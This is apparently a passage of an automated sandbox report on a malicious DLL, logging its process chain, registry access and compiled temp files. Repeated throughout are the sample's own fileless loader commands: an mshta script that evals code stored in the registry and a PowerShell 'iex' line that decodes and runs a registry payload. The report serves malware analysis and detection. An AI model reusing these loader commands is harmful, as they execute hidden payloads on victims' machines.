Source: C:\Windows\System32\control.exe	Mutant created: \Sessions\1\BaseNamedObjects\{3C30E525-6B4E-CE90-D530-CFE2D9647336}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5960:120:WilError_01

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Temp\~DF7279FB1455334C84.TMP

Jump to behavior

Source: 2790000.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Program Files\internet explorer\iexplore.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\2790000.dll',#1

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\2790000.dll'
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\2790000.dll',#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\2790000.dll
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\2790000.dll',#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\2790000.dll,DllRegisterServer
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:17410 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:17426 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:17430 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:82966 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:82970 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:82982 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:17460 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:17468 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:17472 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:17480 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:83036 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:17500 /prefetch:2
Source: unknown	Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Vo0g='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Vo0g).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>'
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:83052 /prefetch:2
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram))
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:17514 /prefetch:2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:17520 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:279558 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:83084 /prefetch:2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\rzslcw3n\rzslcw3n.cmdline'
Source: unknown	Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>N4ot='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(N4ot).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESD796.tmp' 'c:\Users\user\AppData\Local\Temp\rzslcw3n\CSCA64EAED44D2B4776864E5EDA5D4E8B86.TMP'
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Nohx='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Nohx).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>'
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:83090 /prefetch:2
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\rpyoew2f\rpyoew2f.cmdline'
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:17546 /prefetch:2
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES30B.tmp' 'c:\Users\user\AppData\Local\Temp\rpyoew2f\CSCDF3AABDF3FB34DF1A43A4F7FD45C9671.TMP'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\xwrbq4ie\xwrbq4ie.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\pkkmtuzt\pkkmtuzt.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES1395.tmp' 'c:\Users\user\AppData\Local\Temp\xwrbq4ie\CSCC07B09CA405E4901BCF4DD90291B57CA.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES1D78.tmp' 'c:\Users\user\AppData\Local\Temp\pkkmtuzt\CSC7DF2BB886B1A41BB8B841DD3834E0B8.TMP'
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\2790000.dll',#1	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\2790000.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\2790000.dll,DllRegisterServer	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\2790000.dll',#1	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:17410 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:17426 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:17430 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:82966 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:82970 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:82982 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:17460 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:17468 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:17472 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:17480 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:83036 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:17500 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:83052 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:17514 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:17520 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:279558 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:83084 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:83090 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:17546 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:17468 /prefetch:2	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\rzslcw3n\rzslcw3n.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\rpyoew2f\rpyoew2f.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESD796.tmp' 'c:\Users\user\AppData\Local\Temp\rzslcw3n\CSCA64EAED44D2B4776864E5EDA5D4E8B86.TMP'
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\xwrbq4ie\xwrbq4ie.cmdline'
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\pkkmtuzt\pkkmtuzt.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES30B.tmp' 'c:\Users\user\AppData\Local\Temp\rpyoew2f\CSCDF3AABDF3FB34DF1A43A4F7FD45C9671.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES1395.tmp' 'c:\Users\user\AppData\Local\Temp\xwrbq4ie\CSCC07B09CA405E4901BCF4DD90291B57CA.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES1D78.tmp' 'c:\Users\user\AppData\Local\Temp\pkkmtuzt\CSC7DF2BB886B1A41BB8B841DD3834E0B8.TMP'

Source: C:\Windows\System32\loaddll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Jump to behavior

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Source:	Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 0000002C.00000002.886760710.0000026782F50000.00000002.00000001.sdmp, csc.exe, 00000036.00000002.914710159.00000138B0E20000.00000002.00000001.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\xwrbq4ie\xwrbq4ie.pdbXP* source: powershell.exe, 0000002F.00000002.962874378.00000251AFDE2000.00000004.00000001.sdmp
Source:	Binary string: ntdll.pdb source: loaddll32.exe, 00000000.00000003.889958591.0000000004330000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000002.942501146.0000000006560000.00000004.00000001.sdmp
Source:	Binary string: ntdll.pdbUGP source: loaddll32.exe, 00000000.00000003.889958591.0000000004330000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000002.942501146.0000000006560000.00000004.00000001.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\xwrbq4ie\xwrbq4ie.pdb source: powershell.exe, 0000002F.00000002.962727249.00000251AFD82000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\xwrbq4ie\xwrbq4ie.pdbl\ModuleAnalysisCache.0.0.0__31bf3856ad364e35\System.Management.Automation.dllmands.Utility.dllt.dll source: powershell.exe, 0000002F.00000002.935651242.00000251AA29E000.00000004.00000020.sdmp

Data Obfuscation:

Suspicious powershell command line found

Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram))
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram))
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram))
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram))
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram))
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram))

Compiles C# or VB.Net code

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\rzslcw3n\rzslcw3n.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\rpyoew2f\rpyoew2f.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\xwrbq4ie\xwrbq4ie.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\pkkmtuzt\pkkmtuzt.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\rzslcw3n\rzslcw3n.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\rpyoew2f\rpyoew2f.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\xwrbq4ie\xwrbq4ie.cmdline'
